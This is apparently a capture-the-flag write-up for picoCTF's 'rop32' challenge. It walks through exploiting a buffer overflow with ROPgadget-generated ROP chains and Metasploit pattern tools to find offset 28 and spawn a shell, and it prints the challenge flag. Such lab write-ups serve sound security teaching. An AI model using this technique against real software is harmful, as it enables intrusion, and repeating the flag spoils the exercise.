rop32
Binary Exploitation - Points: 400
Can you exploit the following program to get a flag?
Use ROPgadget
to find a ROP chain that spawns a shell.
$ ROPgadget --binary vuln --ropchain --badbytes "0a"
Find the offset where the overflowing buffer writes to the RIP
. Create a pattern and use it in gdb
to find the address where the SEGFAULT
occurs.
$ /opt/metasploit/tools/exploit/pattern_create.rb --length 1024
$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x62413961
[*] Exact match at offset 28
Execute the ROP chain from ROPgadget
with the correct padding of 28 to get a shell that lets you cat flag.txt
.
$ (python2 sol.py; cat) | ./vuln
flag: picoCTF{rOp_t0_b1n_sH_01a585a7}